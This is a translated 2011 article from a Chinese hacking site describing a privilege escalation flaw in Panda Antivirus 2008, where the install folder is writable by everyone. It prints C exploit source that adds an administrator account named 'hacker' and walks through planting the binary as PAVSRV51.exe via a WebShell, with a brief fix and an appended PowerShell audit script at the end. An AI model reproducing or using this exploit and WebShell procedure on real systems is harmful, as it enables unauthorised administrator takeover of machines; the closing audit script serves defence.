Panda local privilege escalation vulnerability - vulnerability warning - 黑吧安全网 (MYHACK58)

2011-02-18T00:00:00
ID MYHACK58:62201129218
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-02-18T00:00:00

Description

This article presents a Panda local privilege escalation vulnerability. I think it may be of help for privilege escalation, so I will describe it in detail; after all, one more idea never hurts.

Compiling the EXP

First, look at the vulnerability description. Panda installs its system files with insecure access permissions, and a local attacker can use this to elevate privileges and obtain full control of the system. When Panda 2008 is installed, the default installation folder "%ProgramFiles%\Panda Security\Panda Antivirus 2008\" has its permissions set to "Everyone: Full Control". Some services, such as PAVSRV51.EXE, are started from this folder under the LocalSystem account, yet the service executables are not protected in any way. An unprivileged user can replace a service executable with a file of their own and obtain full access with local system privileges, or obtain the privileges of any other user who logs on to the host, including system administrators. The root cause is the directory permission setting: it is set so that anyone has full access, and full access here means execute, write and read. The EXP for this vulnerability is written in C for Windows; the code is as follows.


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system(), _MAX_PATH */

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    /* Locate net.exe via the Windows directory rather than relying on PATH */
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "cnbird modified version\n" );
    printf( "creating user \"hacker\" with password \"hacker\"...\n" );
    wsprintf( szCmdLine, "%s\\system32\\net.exe user hacker hacker /add", szWinDir );
    system( szCmdLine );

    printf( "adding user \"hacker\" to the local Administrators group...\n" );
    /* The listing as published passed "owner" here, which did not match the
       message above or the user created in the previous step. */
    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators hacker /add", szWinDir );
    system( szCmdLine );

    printf( "add success...Good Luck..." );
    return 0;
}

I made some changes to the source to keep it simple and easy to use. Save the code above as pandalocalexp.c and compile it with VC++; I won't go into the compilation process. The program I compiled, PAVSRV51.exe, is provided below and can be used directly. Here I will keep you in suspense: for now I won't tell you why the name was changed to PAVSRV51.exe.

Using the local EXP

From the vulnerability description above we learned that the vulnerability is caused by a problem with Panda's directory permissions, which let anyone access it; that means we can replace Panda's main program. Here is the specific operation. Since this is a local privilege escalation vulnerability, assume we already have a WebShell on a website. Log in to the WebShell and find Panda's installation directory, here "C:\Program Files\Panda Software\Panda Antivirus 2008", and enter it, as shown in Figure 1.

Figure 1

Step one: upload our local exploit program into this folder. Don't worry, this directory is controllable by anyone, so you can upload with confidence! As shown in Figure 2, I first renamed the program to 1.exe.

Figure 2

Step two: rename Panda's main program PAVSRV51.exe to PAVSRV51.old using the WebShell's "move" command. Step three: rename the 1.exe we uploaded to PAVSRV51.exe. That is basically all there is to it; all we have to do now is wait for the server to restart, at which point our exploit program is loaded and the user is added. Because I already had server permissions, I simply restarted it directly. Viewing the users, ha ha, the user hacker with password hacker has been added successfully, as shown in Figure 3, and with system privileges.

Figure 3

I won't say more here; the rest is up to you. Finally, the fix for this vulnerability is very simple: just lower the permissions on Panda's installation directory so that ordinary users no longer have permission to run commands in it.
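As a defensive counterpart to the vulnerability described above, here is an added PowerShell audit that is not part of the original article: it enumerates every installed service and reports those whose executable lives in a directory that Everyone, Users or Authenticated Users can write to, which is exactly the condition PAVSRV51.EXE was in. The principal list, the write-rights mask and the path parsing are my own assumptions, not anything from Panda or the article.

```powershell
# Added audit script (not from the original article).
# Reports services whose binary directory grants write rights to low-privilege
# principals; such a service running as LocalSystem can be hijacked by replacing
# its executable, as the article shows for PAVSRV51.EXE.
$weakPrincipals = @('Everyone', 'BUILTIN\Users',
                    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow creating, replacing, renaming or re-permissioning files in the
# directory. FullControl and Modify contain these bits, so they are caught too.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceExePath([string]$PathName) {
    # PathName is either "C:\dir with spaces\svc.exe" -args or C:\dir\svc.exe -args
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(\S.*?\.exe)\b') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $exe = Get-ServiceExePath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
    $dir = Split-Path -LiteralPath $exe -Parent
    $acl = Get-Acl -LiteralPath $dir
    foreach ($ace in $acl.Access) {
        $grantsWrite = ($ace.AccessControlType -eq 'Allow') -and
                       (($ace.FileSystemRights -band $writeMask) -ne 0)
        if ($grantsWrite -and ($weakPrincipals -contains $ace.IdentityReference.Value)) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName      # 'LocalSystem' is the worst case
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
} | Format-Table -AutoSize
```

Run it from an elevated PowerShell; each row is a service binary directory an unprivileged principal can modify. The fix the article describes corresponds to removing that ACE, for example `icacls "<directory>" /remove:g Everyone`, leaving ordinary users read and execute only.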